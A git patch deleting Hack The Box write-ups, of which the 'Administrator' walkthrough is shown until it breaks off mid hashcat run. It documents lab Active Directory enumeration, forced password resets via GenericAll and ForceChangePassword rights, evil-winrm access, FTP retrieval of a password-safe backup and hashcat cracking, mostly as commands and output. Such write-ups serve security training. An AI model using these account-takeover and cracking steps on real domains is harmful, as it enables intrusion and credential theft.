From a3aa0fc1e5dc39d62eaaa651ec57276090d83bcc Mon Sep 17 00:00:00 2001 From: Skeletonephilim Date: Thu, 2 Jul 2026 06:55:25 +0200 Subject: [PATCH 1/5] Clear old writeups --- Administrator HTB [MEDIUM].md | 1043 ------------------ BabyTwo HTB [MEDIUM].md | 991 ----------------- Blackfield HTB [HARD].md | 1827 -------------------------------- Breach HTB [MEDIUM].md | 1224 --------------------- Cicada HTB [EASY].md | 425 -------- Cronos [MEDIUM].md | 422 -------- DarkZero [HARD].md | 1013 ------------------ Data [EASY].md | 1677 ----------------------------- Delegate HTB [MEDIUM].md | 1005 ------------------ Down HTB [EASY].md | 725 ------------- Lock HTB [EASY].md | 1245 ---------------------- Manage HTB [EASY].md | 687 ------------ Optimum HTB [EASY].md | 725 ------------- Phantom HTB [MEDIUM].md | 1351 ----------------------- Pirate HTB [HARD].md | 714 ------------- README.md | 10 - Redelegate HTB [HARD].md | 899 ---------------- Reel HTB [HARD].md | 1150 -------------------- Return HTB [EASY].md | 438 -------- Sauna HTB [EASY].md | 1250 ---------------------- Sendai [MEDIUM].md | 1557 --------------------------- Shibuya HTB [HARD].md | 942 ---------------- Store HTB [HARD].md | 532 ---------- Tenten HTB [MEDIUM].md | 838 --------------- Wifinetic HTB [EASY].md | 454 -------- 25 files changed, 23144 deletions(-) delete mode 100644 Administrator HTB [MEDIUM].md delete mode 100644 BabyTwo HTB [MEDIUM].md delete mode 100644 Blackfield HTB [HARD].md delete mode 100644 Breach HTB [MEDIUM].md delete mode 100644 Cicada HTB [EASY].md delete mode 100644 Cronos [MEDIUM].md delete mode 100644 DarkZero [HARD].md delete mode 100644 Data [EASY].md delete mode 100644 Delegate HTB [MEDIUM].md delete mode 100644 Down HTB [EASY].md delete mode 100644 Lock HTB [EASY].md delete mode 100644 Manage HTB [EASY].md delete mode 100644 Optimum HTB [EASY].md delete mode 100644 Phantom HTB [MEDIUM].md delete mode 100644 Pirate HTB [HARD].md delete mode 100644 README.md delete mode 100644 Redelegate HTB [HARD].md delete mode 100644 Reel HTB [HARD].md delete mode 100644 Return HTB [EASY].md delete mode 100644 Sauna HTB [EASY].md delete mode 100644 Sendai [MEDIUM].md delete mode 100644 Shibuya HTB [HARD].md delete mode 100644 Store HTB [HARD].md delete mode 100644 Tenten HTB [MEDIUM].md delete mode 100644 Wifinetic HTB [EASY].md diff --git a/Administrator HTB [MEDIUM].md b/Administrator HTB [MEDIUM].md deleted file mode 100644 index 72f8291..0000000 --- a/Administrator HTB [MEDIUM].md +++ /dev/null @@ -1,1043 +0,0 @@ -Target : 10.129.12.40 - -Date : 03/06/2026 - -Machine Information : -"As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich" - -```bash ->  echo "10.129.12.40 administrator.htb" | sudo tee -a /etc/hosts -Please touch the FIDO authenticator. -10.129.12.40 administrator.htb ->  nmap -sC -sV -Pn -O -p- --min-rate=2500 10.129.12.40 -Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-03 17:48 +0200 -Warning: 10.129.12.40 giving up on port because retransmission cap hit (10). -Nmap scan report for administrator.htb (10.129.12.40) -Host is up (0.057s latency). -Not shown: 65510 closed tcp ports (reset) -PORT      STATE SERVICE       VERSION -21/tcp    open  ftp           Microsoft ftpd -| ftp-syst:   -|_  SYST: Windows_NT -53/tcp    open  domain        Simple DNS Plus -88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-06-03 22:49:17Z) -135/tcp   open  msrpc         Microsoft Windows RPC -139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn -389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb, Site: Default-First-Site-Name) -445/tcp   open  microsoft-ds? -464/tcp   open  kpasswd5? -593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0 -636/tcp   open  tcpwrapped -3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb, Site: Default-First-Site-Name) -3269/tcp  open  tcpwrapped -5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) -|_http-title: Not Found -|_http-server-header: Microsoft-HTTPAPI/2.0 -9389/tcp  open  mc-nmf        .NET Message Framing -47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) -|_http-server-header: Microsoft-HTTPAPI/2.0 -|_http-title: Not Found -49664/tcp open  msrpc         Microsoft Windows RPC -49665/tcp open  msrpc         Microsoft Windows RPC -49666/tcp open  msrpc         Microsoft Windows RPC -49667/tcp open  msrpc         Microsoft Windows RPC -49668/tcp open  msrpc         Microsoft Windows RPC -50251/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0 -50256/tcp open  msrpc         Microsoft Windows RPC -50259/tcp open  msrpc         Microsoft Windows RPC -50276/tcp open  msrpc         Microsoft Windows RPC -63001/tcp open  msrpc         Microsoft Windows RPC -No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). -TCP/IP fingerprint: -OS:SCAN(V=7.99%E=4%D=6/3%OT=21%CT=1%CU=38425%PV=Y%DS=2%DC=I%G=Y%TM=6A204D44 -OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=108%TI=I%CI=I%II=I%SS=S%TS=A -OS:)SEQ(SP=105%GCD=1%ISR=107%TI=I%CI=I%II=I%SS=S%TS=A)SEQ(SP=106%GCD=1%ISR= -OS:10A%TI=I%CI=I%II=I%SS=S%TS=A)SEQ(SP=FC%GCD=1%ISR=110%TI=I%CI=I%II=I%SS=S -OS:%TS=A)OPS(O1=M552NW8ST11%O2=M552NW8ST11%O3=M552NW8NNT11%O4=M552NW8ST11%O -OS:5=M552NW8ST11%O6=M552ST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6 -OS:=FFDC)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M552NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O -OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD= -OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0% -OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G -OS:%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z) - -Network Distance: 2 hops -Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows - -Host script results: -| smb2-security-mode:   -|   3.1.1:   -|_    Message signing enabled and required -|_clock-skew: 7h00m03s -| smb2-time:   -|   date: 2026-06-03T22:50:23 -|_  start_date: N/A - -OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . -Nmap done: 1 IP address (1 host up) scanned in 139.60 seconds -``` - -This looks like an Active Directory Windows box, with some tweaks : ports `88/tcp` (Kerberos), `389/tcp & 3268/tcp` (LDAP Active Directory), `135/tcp` (RPC), `139/tcp` (NetBIOS) and `445/tcp` (smb2 3.1.1) are open as well as `21/tcp` (ftp), `53/tcp` (DNS), and some Microsoft over HTTP ports as well. - -It's not often that we see the ftp port open. - -```bash ->  ftp 10.129.12.40 -Connected to 10.129.12.40. -220 Microsoft FTP Service -Name (10.129.12.40:vagabond): Olivia -331 Password required -Password:   -530 User cannot log in, home directory inaccessible. -ftp: Login failed. -``` - -Looks like the base `Olivia:ichliebedich` can't get into FTP. Then, we'll try NetExec : - -```bash ->  nxc smb 10.129.12.40 -u Olivia -p 'ichliebedich' --shares --users --groups -SMB         10.129.12.40    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True) -SMB         10.129.12.40    445    DC               [+] administrator.htb\Olivia:ichliebedich   -SMB         10.129.12.40    445    DC               [*] Enumerated shares -SMB         10.129.12.40    445    DC               Share           Permissions     Remark -SMB         10.129.12.40    445    DC               -----           -----------     ------ -SMB         10.129.12.40    445    DC               ADMIN$                          Remote Admin -SMB         10.129.12.40    445    DC               C$                              Default share -SMB         10.129.12.40    445    DC               IPC$            READ            Remote IPC -SMB         10.129.12.40    445    DC               NETLOGON        READ            Logon server share   -SMB         10.129.12.40    445    DC               SYSVOL          READ            Logon server share   -SMB         10.129.12.40    445    DC               -Username-                    -Last PW Set-       -BadPW- -Description-                                                 -SMB         10.129.12.40    445    DC               Administrator                 2024-10-22 18:59:36 0       Built-in account for administering the computer/domain   -SMB         10.129.12.40    445    DC               Guest                                      0       Built-in account for guest access to the computer/domain   -SMB         10.129.12.40    445    DC               krbtgt                        2024-10-04 19:53:28 0       Key Distribution Center Service Account   -SMB         10.129.12.40    445    DC               olivia                        2024-10-06 01:22:48 0          -SMB         10.129.12.40    445    DC               michael                       2024-10-06 01:33:37 0          -SMB         10.129.12.40    445    DC               benjamin                      2024-10-06 01:34:56 0          -SMB         10.129.12.40    445    DC               emily                         2024-10-30 23:40:02 0          -SMB         10.129.12.40    445    DC               ethan                         2024-10-12 20:52:14 0          -SMB         10.129.12.40    445    DC               alexander                     2024-10-31 00:18:04 0          -SMB         10.129.12.40    445    DC               emma                          2024-10-31 00:18:35 0          -SMB         10.129.12.40    445    DC               [*] Enumerated 10 local users: ADMINISTRATOR -SMB         10.129.12.40    445    DC               [-] [REMOVED] Arg moved to the ldap protocol - ->  nxc winrm 10.129.12.40 -u Olivia -p 'ichliebedich' -WINRM       10.129.12.40    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)   -WINRM       10.129.12.40    5985   DC               [+] administrator.htb\Olivia:ichliebedich (Pwn3d!) -``` - -So we have direct access to a WinRM shell as well as `READ` on `SYSVOL` and `NETLOGON`. - -We'll start with the shell : - -```PowerShell ->  evil-winrm -i 10.129.12.40 -u Olivia -p 'ichliebedich' -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems -/usr/lib/ruby/3.4.0/readline.rb:4: warning: reline was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 4.0.0. -You can add reline to your Gemfile or gemspec to silence this warning. -                                         -Evil-WinRM shell v3.9 -                                         -Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline -                                         -Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion -                                         -Info: Establishing connection to remote endpoint -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -*Evil-WinRM* PS C:\Users\olivia\Documents> whoami -administrator\olivia -*Evil-WinRM* PS C:\Users\olivia\Documents> whoami /priv - -PRIVILEGES INFORMATION ----------------------- - -Privilege Name                Description                    State -============================= ============================== ======= -SeMachineAccountPrivilege     Add workstations to domain     Enabled -SeChangeNotifyPrivilege       Bypass traverse checking       Enabled -SeIncreaseWorkingSetPrivilege Increase a process working set Enabled - -*Evil-WinRM* PS C:\Users\olivia\Documents> cd C:\Users\ -*Evil-WinRM* PS C:\Users> dir - - -   Directory: C:\Users - - -Mode                 LastWriteTime         Length Name -----                 -------------         ------ ---- -d-----        10/22/2024  11:46 AM                Administrator -d-----        10/30/2024   2:25 PM                emily -d-----          6/3/2026   4:05 PM                olivia -d-r---         10/4/2024  10:08 AM                Public - - -*Evil-WinRM* PS C:\Users> cd C:\Users\olivia\Desktop -*Evil-WinRM* PS C:\Users\olivia\Desktop> dir -*Evil-WinRM* PS C:\> cd C:\Users\Public -*Evil-WinRM* PS C:\Users\Public> dir -Access to the path 'C:\Users\Public' is denied. -At line:1 char:1 -+ dir -+ ~~~ -   + CategoryInfo          : PermissionDenied: (C:\Users\Public:String) [Get-ChildItem], UnauthorizedAccessException -   + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand -``` - -No user flag here, that's obvious, and we appear to not be able to do much inside the shell. - -```bash ->  smbclient //10.129.12.40/SYSVOL -U Olivia%ichliebedich -Try "help" to get a list of possible commands. -smb: \> ls - .                                   D        0  Fri Oct  4 21:48:08 2024 - ..                                  D        0  Fri Oct  4 21:48:08 2024 - administrator.htb                  Dr        0  Fri Oct  4 21:48:08 2024 - -               5606911 blocks of size 4096. 1232523 blocks available -smb: \> cd administrator.htb -smb: \administrator.htb\> ls - .                                   D        0  Fri Oct  4 21:54:15 2024 - ..                                  D        0  Fri Oct  4 21:48:08 2024 - DfsrPrivate                      DHSr        0  Fri Oct  4 21:54:15 2024 - Policies                            D        0  Fri Oct  4 21:48:32 2024 - scripts                             D        0  Fri Oct  4 21:48:08 2024 - -               5606911 blocks of size 4096. 1236270 blocks available -smb: \administrator.htb\> ls scripts - scripts                             D        0  Fri Oct  4 21:48:08 2024 - -               5606911 blocks of size 4096. 1236498 blocks available -smb: \administrator.htb\> cd scripts -smb: \administrator.htb\scripts\> ls - .                                   D        0  Fri Oct  4 21:48:08 2024 - ..                                  D        0  Fri Oct  4 21:54:15 2024 - -               5606911 blocks of size 4096. 1239434 blocks available -smb: \administrator.htb\scripts\> cd /administrator.htb/Policies -smb: \administrator.htb\Policies\> ls - .                                   D        0  Fri Oct  4 21:48:32 2024 - ..                                  D        0  Fri Oct  4 21:54:15 2024 - {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Fri Oct  4 21:48:32 2024 - {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Fri Oct  4 21:48:32 2024 - -               5606911 blocks of size 4096. 1244309 blocks available -smb: \administrator.htb\Policies\> cd ^C ->  smbclient //10.129.12.40/SYSVOL -U Olivia%ichliebedich -Try "help" to get a list of possible commands. -smb: \> cd administrator.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9} -smb: \administrator.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls - .                                   D        0  Fri Oct  4 21:48:32 2024 - ..                                  D        0  Fri Oct  4 21:48:32 2024 - GPT.INI                             A       23  Wed Oct 30 22:22:19 2024 - MACHINE                             D        0  Sat Oct  5 19:34:47 2024 - USER                                D        0  Fri Oct  4 21:48:32 2024 - -               5606911 blocks of size 4096. 1250753 blocks available -smb: \administrator.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd USER -smb: \administrator.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> ls - .                                   D        0  Fri Oct  4 21:48:32 2024 - ..                                  D        0  Fri Oct  4 21:48:32 2024 - -               5606911 blocks of size 4096. 1252250 blocks available -smb: \administrator.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> ls -al -NT_STATUS_NO_SUCH_FILE listing \administrator.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\-al -smb: \administrator.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> exit ->  smbclient //10.129.12.40/SYSVOL -U Olivia%ichliebedich -Try "help" to get a list of possible commands. -smb: \> ls - .                                   D        0  Fri Oct  4 21:48:08 2024 - ..                                  D        0  Fri Oct  4 21:48:08 2024 - administrator.htb                  Dr        0  Fri Oct  4 21:48:08 2024 - -               5606911 blocks of size 4096. 1259198 blocks available -smb: \> cd administrator.htb -smb: \administrator.htb\> ls - .                                   D        0  Fri Oct  4 21:54:15 2024 - ..                                  D        0  Fri Oct  4 21:48:08 2024 - DfsrPrivate                      DHSr        0  Fri Oct  4 21:54:15 2024 - Policies                            D        0  Fri Oct  4 21:48:32 2024 - scripts                             D        0  Fri Oct  4 21:48:08 2024 - -               5606911 blocks of size 4096. 1260803 blocks available -smb: \administrator.htb\> cd Policies -smb: \administrator.htb\Policies\> ls - .                                   D        0  Fri Oct  4 21:48:32 2024 - ..                                  D        0  Fri Oct  4 21:54:15 2024 - {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Fri Oct  4 21:48:32 2024 - {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Fri Oct  4 21:48:32 2024 - -               5606911 blocks of size 4096. 1262563 blocks available -smb: \administrator.htb\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9} -smb: \administrator.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls - .                                   D        0  Fri Oct  4 21:48:32 2024 - ..                                  D        0  Fri Oct  4 21:48:32 2024 - GPT.INI                             A       23  Wed Oct 30 22:22:19 2024 - MACHINE                             D        0  Sat Oct  5 19:34:47 2024 - USER                                D        0  Fri Oct  4 21:48:32 2024 - -               5606911 blocks of size 4096. 1264959 blocks available -smb: \administrator.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> get GPT.INI -getting file \administrator.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec) -smb: \administrator.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd /administrator.htb/Policies/ -smb: \administrator.htb\Policies\> cd {6AC1786C-016F-11D2-945F-00C04fB984F9} -smb: \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\> ls - .                                   D        0  Fri Oct  4 21:48:32 2024 - ..                                  D        0  Fri Oct  4 21:48:32 2024 - GPT.INI                             A       22  Thu Oct 31 00:56:19 2024 - MACHINE                             D        0  Thu Oct 31 00:56:19 2024 - USER                                D        0  Fri Oct  4 21:48:32 2024 - -               5606911 blocks of size 4096. 1273737 blocks available -smb: \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\> cd MACHINE -smb: \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\> ls - .                                   D        0  Thu Oct 31 00:56:19 2024 - ..                                  D        0  Fri Oct  4 21:48:32 2024 - comment.cmtx                        A      553  Thu Oct 31 00:56:19 2024 - Microsoft                           D        0  Fri Oct  4 21:48:32 2024 - Registry.pol                        A      184  Thu Oct 31 00:56:19 2024 - Scripts                             D        0  Wed Oct 30 22:22:32 2024 - -               5606911 blocks of size 4096. 1961904 blocks available -smb: \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\> get Registry.pol* -NT_STATUS_OBJECT_NAME_INVALID opening remote file \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Registry.pol* -smb: \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\> get Registry.pol -getting file \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Registry.pol of size 184 as Registry.pol (0.5 KiloBytes/sec) (average 0.3 KiloBytes/sec) -smb: \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\> get comment.cmtx -getting file \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\comment.cmtx of size 553 as comment.cmtx (1.3 KiloBytes/sec) (average 0.6 KiloBytes/sec) -smb: \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\> cd Microsoft -smb: \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\> ls - .                                   D        0  Fri Oct  4 21:48:32 2024 - ..                                  D        0  Thu Oct 31 00:56:19 2024 - Windows NT                          D        0  Fri Oct  4 21:48:32 2024 - -               5606911 blocks of size 4096. 2068391 blocks available -smb: \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\> cd Windows NT -cd \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows\: NT_STATUS_OBJECT_NAME_NOT_FOUND -smb: \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\> cd "Windows NT" -smb: \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\> ls - .                                   D        0  Fri Oct  4 21:48:32 2024 - ..                                  D        0  Fri Oct  4 21:48:32 2024 - SecEdit                             D        0  Wed Oct 30 22:22:53 2024 - -               5606911 blocks of size 4096. 2068391 blocks available -smb: \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\> cd SecEdit -smb: \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\> ls - .                                   D        0  Wed Oct 30 22:22:53 2024 - ..                                  D        0  Fri Oct  4 21:48:32 2024 - GptTmpl.inf                         A     4262  Wed Oct 30 22:22:53 2024 - -               5606911 blocks of size 4096. 2068135 blocks available -smb: \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\> get GptTmpl.inf -getting file \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 4262 as GptTmpl.inf (9.8 KiloBytes/sec) (average 3.0 KiloBytes/sec) -smb: \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\> quit -``` - -We grabbed some files but so far it's a dead end. We'll add the domain control to the hosts so we can try bloodhound. - -```bash ->  echo "10.129.12.40 dc.administrator.htb administrator.htb" | sudo tee -a /etc/hosts -Please touch the FIDO authenticator. -10.129.12.40 dc.administrator.htb administrator.htb -``` - -We try to get the data for bloodhound from Olivia : - -```bash ->  bloodhound-python -d administrator.htb -c All -u olivia -p 'ichliebedich' -ns 10.129.12.40 --zip - -INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3) -INFO: Found AD domain: administrator.htb -INFO: Getting TGT for user -WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) -INFO: Connecting to LDAP server: dc.administrator.htb -INFO: Found 1 domains -INFO: Found 1 domains in the forest -INFO: Found 1 computers -INFO: Connecting to LDAP server: dc.administrator.htb -INFO: Found 11 users -INFO: Found 53 groups -INFO: Found 2 gpos -INFO: Found 1 ous -INFO: Found 19 containers -INFO: Found 0 trusts -INFO: Starting computer enumeration with 10 workers -INFO: Querying computer: dc.administrator.htb -INFO: Done in 00M 28S -INFO: Compressing output into 20260603181735_bloodhound.zip -``` - -We got everything we could, now we open `bloodhound` and upload the database. - -We see that Olivia only has 1 `Outbound Object Control` and it's on user `michael`. -We have `GenericAll` which means we have all rights on `michael` as Olivia. - -That means we can change his password with RPC. - -```PowerShell ->  net rpc password "michael" "Scrow123&" -U "administrator.htb"/"Olivia%ichliebedich" -S 10.129.12.40 ->  nxc winrm 10.129.12.40 -u michael -p 'Scrow123&' -WINRM       10.129.12.40    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)   -WINRM       10.129.12.40    5985   DC               [+] administrator.htb\michael:Scrow123& (Pwn3d!) - ->  evil-winrm -i 10.129.12.40 -u michael -p 'Scrow123&' -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems -/usr/lib/ruby/3.4.0/readline.rb:4: warning: reline was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 4.0.0. -You can add reline to your Gemfile or gemspec to silence this warning. -                                         -Evil-WinRM shell v3.9 -                                         -Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline -                                         -Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion -                                         -Info: Establishing connection to remote endpoint -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -*Evil-WinRM* PS C:\Users\michael\Documents> cd C:/Users/ -*Evil-WinRM* PS C:\Users> dir - - -   Directory: C:\Users - - -Mode                 LastWriteTime         Length Name -----                 -------------         ------ ---- -d-----        10/22/2024  11:46 AM                Administrator -d-----        10/30/2024   2:25 PM                emily -d-----          6/3/2026   4:26 PM                michael -d-----          6/3/2026   4:05 PM                olivia -d-r---         10/4/2024  10:08 AM                Public - - -*Evil-WinRM* PS C:\Users> cd michael/Desktop -*Evil-WinRM* PS C:\Users\michael\Desktop> dir -*Evil-WinRM* PS C:\Users\michael\Desktop> whoami /priv - -PRIVILEGES INFORMATION ----------------------- - -Privilege Name                Description                    State -============================= ============================== ======= -SeMachineAccountPrivilege     Add workstations to domain     Enabled -SeChangeNotifyPrivilege       Bypass traverse checking       Enabled -SeIncreaseWorkingSetPrivilege Increase a process working set Enabled -``` - -So we still don't have the user flag, but now we own michael. - -We'll look at his shares on SMB and his rights on `bloodhound` : - -```bash ->  nxc smb 10.129.12.40 -u michael -p 'Scrow123&' --shares -SMB         10.129.12.40    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True) -SMB         10.129.12.40    445    DC               [+] administrator.htb\michael:Scrow123&   -SMB         10.129.12.40    445    DC               [*] Enumerated shares -SMB         10.129.12.40    445    DC               Share           Permissions     Remark -SMB         10.129.12.40    445    DC               -----           -----------     ------ -SMB         10.129.12.40    445    DC               ADMIN$                          Remote Admin -SMB         10.129.12.40    445    DC               C$                              Default share -SMB         10.129.12.40    445    DC               IPC$            READ            Remote IPC -SMB         10.129.12.40    445    DC               NETLOGON        READ            Logon server share   -SMB         10.129.12.40    445    DC               SYSVOL          READ        -      Logon server share -``` - -Same smb rights as Olivia, luckily for us, we have a `ForceChangePassword` on `benjamin` as `michael`. - -```bash ->  net rpc password "benjamin" "Scrow123&" -U "administrator.htb"/"michael%Scrow123&" -S 10.129.12.40 ->  nxc winrm 10.129.12.40 -u benjamin -p 'Scrow123&' -WINRM       10.129.12.40    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)   -WINRM       10.129.12.40    5985   DC               [-] administrator.htb\benjamin:Scrow123& ->  nxc smb 10.129.12.40 -u benjamin -p 'Scrow123&' --shares -SMB         10.129.12.40    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True) -SMB         10.129.12.40    445    DC               [+] administrator.htb\benjamin:Scrow123&   -SMB         10.129.12.40    445    DC               [*] Enumerated shares -SMB         10.129.12.40    445    DC               Share           Permissions     Remark -SMB         10.129.12.40    445    DC               -----           -----------     ------ -SMB         10.129.12.40    445    DC               ADMIN$                          Remote Admin -SMB         10.129.12.40    445    DC               C$                              Default share -SMB         10.129.12.40    445    DC               IPC$            READ            Remote IPC -SMB         10.129.12.40    445    DC               NETLOGON        READ            Logon server share   -SMB         10.129.12.40    445    DC               SYSVOL          READ            Logon server share -``` - -So, no shell but same shares. - -We forgot to netexec ftp the two users we got : - -```bash ->  nxc ftp 10.129.12.40 -u benjamin -p 'Scrow123&' -FTP         10.129.12.40    21     10.129.12.40     [+] benjamin:Scrow123& ->  nxc ftp 10.129.12.40 -u michael -p 'Scrow123&' -FTP         10.129.12.40    21     10.129.12.40     [-] michael:Scrow123& (Response:530 User cannot log in, home directory inaccessible.) -``` - -So it seems `benjamin` can access the File Transfer Protocol. - -```bash ->  ftp benjamin@10.129.12.40 -Connected to 10.129.12.40. -220 Microsoft FTP Service -331 Password required -Password:   -230 User logged in. -Remote system type is Windows_NT. -ftp> ls -200 PORT command successful. -125 Data connection already open; Transfer starting. -10-05-24  09:13AM                  952 Backup.psafe3 -226 Transfer complete. -ftp> get Backup.psafe3 -200 PORT command successful. -125 Data connection already open; Transfer starting. -WARNING! 3 bare linefeeds received in ASCII mode -File may not have transferred correctly. -226 Transfer complete. -952 bytes received in 0.0517 seconds (17.9834 kbytes/s) -ftp> quit -221 Goodbye. -``` - -We got a backup file, but it's not a .ps1 PowerShell file nor a .hc file that we can mount and decrypt like a VeraCrypt mount. - -It's a simple `passwordsafe v3` password, its hashcat mode is `5200`. - -So we try to decode it first with rules : - -```bash ->  hashcat -a 0 -m 5200 Backup.psafe3 /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -r /usr/share/doc/hashcat/rules/best66.rule -hashcat (v7.1.2) starting - -OpenCL API (OpenCL 3.0 PoCL 7.1  Linux, Release, RELOC, LLVM 20.1.8, SLEEF, DISTRO, CUDA, POCL_DEBUG) - Platform #1 [The pocl project] -====================================================================================================================================== -* Device #01: cpu-haswell-AMD Ryzen 5 3500U with Radeon Vega Mobile Gfx, 8912/17824 MB (8912 MB allocatable), 8MCU - -Minimum password length supported by kernel: 0 -Maximum password length supported by kernel: 256 -Minimum salt length supported by kernel: 0 -Maximum salt length supported by kernel: 256 - -Hashes: 1 digests; 1 unique digests, 1 unique salts -Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates -Rules: 66 - -Optimizers 